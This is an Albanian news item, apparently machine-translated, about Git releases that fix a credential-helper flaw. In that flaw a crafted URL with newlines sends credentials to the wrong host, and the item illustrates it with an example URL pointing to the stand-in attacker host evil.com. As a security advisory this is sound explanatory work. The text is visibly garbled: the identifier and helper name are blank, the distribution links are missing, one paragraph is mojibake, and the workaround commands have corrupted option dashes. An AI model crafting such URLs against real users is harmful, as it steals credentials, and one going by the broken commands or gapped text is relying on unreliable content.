korrigjueset e lëshimeve të sistemit të shpërndarë të menaxhimit të kodeve burimore Git 2.26.1, 2.25.3, 2.24.2, 2.23.2, 2.22.3, 2.21.2, 2.20.3, 2.19.4, 2.18.3 dhe 2.17.4, në të cilat është eliminuar () në përpunuesin "" që çon në dërgimin e kredencialeve në host-in e gabuar kur klienti git lidhet me një depozitë përmes një URL-je të formatuar veçanërisht, duke përfshirë simbolet e linjës së re. Kjo ndjeshmëri mund të përdoret për të organizuar dërgimin në serverin e kontrolluar nga sulmuesi, të dhënave të tjera nga një host i ndryshëm.
Kur përcaktohet një URL në formatin «https://evil.com?host=github.com/», punëtorja e të dhënave duke u lidhur me hostin evil.com do të kalojë parametrat e autentifikimit të caktuar për github.com. Problemi shfaqet gjatë kryerjes së operacioneve të tilla si «git clone», duke përfshirë në përpunimin e URL-ve për submodulat (për shembull, gjatë ekzekutimit të «git submodule update», do të përpunohen automatikisht URL-të e caktuara në skedarin .gitmodules nga repo). Vulnerabiliteti ka rrezik më të madh në situata kur zhvilluesi kryen klonimin e repos pa e parë URL-në, për shembull, gjatë punës me submodulat, ose në sisteme që kryejnë veprime automatike, si në skenalet e ndërtimit të paketave.
Për të bllokuar ndjeshmërinë në versionet e reja kalimi i simbolit të linjës së re në çdo vlerë që dërgohet përmes këtij protokolli të shkëmbimit të kredencialeve. Për shpërndarjet, mund të ndiqni lëshimin e përditësimeve të paketave në faqet , , , , , , .
Si njĂ« zgjidhje pĂ«r tĂ« bllokuar problemin mos pĂ«rdorni credential.helper kur lidheni me depozita publike dhe mos aplikoni "git clone" nĂ« modalitetin "ârecurse-submodules" me depozita tĂ« pa verifikuara. PĂ«r tĂ« çaktivizuar plotĂ«sisht pĂ«rpunuesin credential.helper, i cili kryen dhe tĂ«rheqjen e fjalĂ«kalimeve nga , e mbrojtur ose skedari me fjalĂ«kalime, mund tĂ« pĂ«rdorni komandat:
git config âunset credential.helper
git config âglobal âunset credential.helper
git config âsystem âunset credential.helper
Burimi: opennet.ru
